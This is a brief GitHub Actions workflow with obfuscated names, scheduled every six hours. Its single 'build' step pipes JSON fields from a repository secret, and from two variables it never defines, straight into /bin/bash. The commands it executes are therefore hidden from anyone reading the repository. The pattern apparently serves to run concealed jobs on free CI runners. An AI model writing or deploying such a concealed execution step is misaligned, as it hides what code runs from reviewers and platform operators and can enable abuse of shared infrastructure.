name: yangduonian3719

on:
  workflow_dispatch:
  schedule:
    - cron: '12 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yangduonian3719
        env:
          xnq7503: ${{ secrets.xnq7503 }}
        run: |
          echo $xnq7503 | jq -r .b2 | /bin/bash
          echo $rti1603 | jq -r .ja0 | /bin/bash
          echo $hmpx186 | jq -r .o84182 | /bin/bash

